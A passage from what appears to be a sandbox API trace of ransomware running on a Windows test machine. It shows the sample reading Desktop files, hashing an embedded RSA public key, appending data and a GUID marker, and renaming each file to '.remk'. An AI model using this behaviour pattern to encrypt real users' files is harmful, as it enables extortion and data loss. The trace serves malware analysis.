nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x11ec0, lpOverlapped=0x0) returned 1 [0231.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.206] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.206] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.207] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.208] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.208] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.208] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.208] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.208] GetLastError () returned 0x0 [0231.208] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.208] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.208] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.208] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.208] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.208] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325fd48 [0231.208] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.209] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.209] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.209] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.209] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.213] CloseHandle (hObject=0x640) returned 1 [0231.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0231.221] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b1b70 [0231.221] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cYR-e.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cyr-e.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cYR-e.avi.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cyr-e.avi.remk")) returned 1 [0231.225] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf00d3bf0, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x898f2a10, ftLastAccessTime.dwHighDateTime=0x1d5e590, ftLastWriteTime.dwLowDateTime=0x898f2a10, ftLastWriteTime.dwHighDateTime=0x1d5e590, nFileSizeHigh=0x0, nFileSizeLow=0xf6ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d24F8YNCqwI.png", cAlternateFileName="D24F8Y~1.PNG")) returned 1 [0231.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.225] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d24F8YNCqwI.png") returned=".png" [0231.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d24F8YNCqwI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d24f8yncqwi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.226] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=63231) returned 1 [0231.226] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.229] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf6d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.229] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.230] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xf6ff, lpOverlapped=0x0) returned 1 [0231.230] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.230] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.230] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.230] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.230] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0231.232] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.232] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.232] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.232] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.232] GetLastError () returned 0x0 [0231.232] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.232] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0231.232] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.232] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.232] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.232] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.233] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325fd48 [0231.233] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.233] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xf6ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.234] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.234] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.234] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.234] CloseHandle (hObject=0x640) returned 1 [0231.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x31b3dd8 [0231.239] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37c2278 [0231.239] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d24F8YNCqwI.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d24f8yncqwi.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d24F8YNCqwI.png.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\d24f8yncqwi.png.remk")) returned 1 [0231.242] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6937e10, ftCreationTime.dwHighDateTime=0x1d5e38c, ftLastAccessTime.dwLowDateTime=0x53746770, ftLastAccessTime.dwHighDateTime=0x1d5de82, ftLastWriteTime.dwLowDateTime=0x53746770, ftLastWriteTime.dwHighDateTime=0x1d5de82, nFileSizeHigh=0x0, nFileSizeLow=0x11e5e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dbj5OVvUTa4bloIz9N.flv", cAlternateFileName="DBJ5OV~1.FLV")) returned 1 [0231.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.242] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0231.242] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dbj5OVvUTa4bloIz9N.flv") returned=".flv" [0231.242] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dbj5OVvUTa4bloIz9N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dbj5ovvuta4bloiz9n.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.243] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=73310) returned 1 [0231.243] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.245] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11e38, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.246] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.247] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.247] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x11e5e, lpOverlapped=0x0) returned 1 [0231.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.249] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0231.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.249] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0231.250] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0231.250] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0231.250] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0231.250] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0231.250] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0231.250] GetLastError () returned 0x0 [0231.250] CryptDestroyHash (hHash=0x31de170) returned 1 [0231.250] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0231.250] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0231.250] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0231.251] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0231.251] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0231.252] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325fd48 [0231.252] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0231.253] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x11e5e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.253] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0231.253] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0231.253] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0231.253] CloseHandle (hObject=0x640) returned 1 [0231.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0231.259] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b1b70 [0231.259] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dbj5OVvUTa4bloIz9N.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dbj5ovvuta4bloiz9n.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\dbj5OVvUTa4bloIz9N.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dbj5ovvuta4bloiz9n.flv.remk")) returned 1 [0231.261] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0231.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.261] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned=".ini" [0231.261] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc57f480, ftCreationTime.dwHighDateTime=0x1d5dff2, ftLastAccessTime.dwLowDateTime=0xdf39ff0, ftLastAccessTime.dwHighDateTime=0x1d5d8c3, ftLastWriteTime.dwLowDateTime=0xdf39ff0, ftLastWriteTime.dwHighDateTime=0x1d5d8c3, nFileSizeHigh=0x0, nFileSizeLow=0xe6c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e6zU.xlsx", cAlternateFileName="E6ZU~1.XLS")) returned 1 [0231.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0231.261] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0231.261] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\e6zU.xlsx") returned=".xlsx" [0231.261] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\e6zU.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e6zu.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0231.261] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=59076) returned 1 [0231.261] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0231.264] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xe69e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0231.264] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0231.266] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0231.266] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xe6c4, lpOverlapped=0x0) returned 1 [0231.267] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0231.267] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 